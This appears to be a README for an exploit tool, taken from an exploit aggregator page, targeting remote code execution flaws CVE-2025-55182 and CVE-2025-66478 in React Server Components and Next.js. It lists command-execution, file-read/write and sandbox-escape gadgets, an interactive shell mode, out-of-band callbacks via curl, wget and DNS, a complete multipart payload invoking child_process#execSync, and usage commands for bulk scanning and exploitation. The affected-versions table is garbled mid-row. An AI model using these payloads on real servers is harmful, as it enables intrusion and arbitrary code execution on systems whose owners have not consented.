Share
## https://sploitus.com/exploit?id=AA4339FC-542B-5DF2-94AA-4D783CEB64D6
# CVE-2025-55182 - React Server Components RCE Exploit v2.0
A comprehensive security research tool for testing **CVE-2025-55182** and **CVE-2025-66478** vulnerabilities in React Server Components (RSC) and Next.js Server Actions.
## Vulnerability Overview
| Property | Value |
|----------|-------|
| **CVE IDs** | CVE-2025-55182, CVE-2025-66478 |
| **CVSS Score** | 10.0 (CRITICAL) |
| **Affected Versions** | React ` | Execute shell command |
| `!read ` | Read file |
| `!write ` | Write file |
| `!js ` | Execute JavaScript |
| `!gadget ` | Switch gadget |
| `exit` | Exit shell |
## Available Gadgets
### RCE Gadgets
| Name | Module ID | Description |
|------|-----------|-------------|
| `execSync` | child_process#execSync | Direct shell command execution |
| `execFileSync` | child_process#execFileSync | Execute binary file |
| `spawnSync` | child_process#spawnSync | Spawn process with arguments |
| `vm_runInThisContext` | vm#runInThisContext | Execute JS in current context |
| `vm_runInNewContext` | vm#runInNewContext | Execute JS with sandbox escape |
| `vm_runInThisContext_global` | vm#runInThisContext | Execute via global.process |
### File Gadgets
| Name | Module ID | Description |
|------|-----------|-------------|
| `fs_readFileSync` | fs#readFileSync | Read arbitrary files |
| `fs_writeFileSync` | fs#writeFileSync | Write arbitrary files |
### OOB Gadgets
| Name | Description |
|------|-------------|
| `vm_fetch` | HTTP request via fetch API (Node 18+) |
| `vm_http` | HTTP request via http module |
## Detection Payloads (CVE-2025-66478)
The `--scan` mode uses these PortSwigger-style detection payloads:
| Payload | Description |
|---------|-------------|
| `property_reference` | Colon-delimited property reference `["$1:a:a"]` |
| `property_reference_v2` | Alternative reference `["$1:b:b"]` |
| `property_reference_constructor` | Constructor access via property reference |
| `property_reference_proto` | Proto chain access via property reference |
| `action_ref_vm` | ACTION_REF with vm#runInThisContext |
| `action_ref_execSync` | ACTION_REF with child_process#execSync |
## OOB Callback Methods
The tool supports multiple OOB callback methods:
| Method | Description |
|--------|-------------|
| `curl` | HTTP request via curl command |
| `wget` | HTTP request via wget command |
| `nslookup` | DNS query |
| `ping` | ICMP ping |
| `fetch` | Node.js fetch API |
| `http` | Node.js http module |
## Output Interpretation
### Terminal Colors
| Color | Status | Meaning |
|-------|--------|---------|
| Green | `[VULN]` | Vulnerable - RCE confirmed |
| Yellow | `[PATCH]` | Patched - Server Actions active but protected |
| Blue | `[RSC]` | Server Actions detected |
| Cyan | `[NEXT]` | Next.js detected |
| Red | `[ERR]` | Connection error |
### Scan Results
```
[VULN] property_reference Vulnerable pattern detected!
-> Error digest pattern: E{"digest"... (needs OOB verification)
[SAFE] property_reference_v2 HTTP 200
[500] action_ref_vm digest:12345
```
## Technical Details
### RSC Flight Format
The tool parses React Server Components' "flight format" responses:
```
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}
```
### Multipart Payload Structure
```
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--
```
### Required HTTP Headers
```http
Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action:
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
```
## Patched Versions
### React
- 19.0.1, 19.1.2, 19.2.1
### Next.js
- 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
## Use Cases
### Bug Bounty
```bash
# 1. Prepare target list
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt
# 2. Bulk scan
python3 exploit-custom.py -l targets.txt --scan -o results.json
# 3. Verify with OOB
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com
```
### Penetration Testing
```bash
# 1. Detect technology
python3 exploit-custom.py -u https://target.com --detect
# 2. Analyze with Burp
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# 3. Exploit
python3 exploit-custom.py -u https://target.com --shell
```
## References
- [Next.js Security Advisory - CVE-2025-66478](https://nextjs.org/blog/CVE-2025-66478)
- [Wiz Research - CVE-2025-55182](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)
- [PortSwigger Research](https://portswigger.net/research)
## Legal Disclaimer
This tool is provided for **authorized security testing** and **educational purposes only**.
**WARNING:** Unauthorized access to computer systems is illegal. Only use this tool on systems you own or have explicit written permission to test.
The authors are not responsible for any misuse or damage caused by this tool.
## License
This tool is released for security research and authorized penetration testing purposes.
---
**Author:** Ünsal Furkan Harani
**Version:** 2.0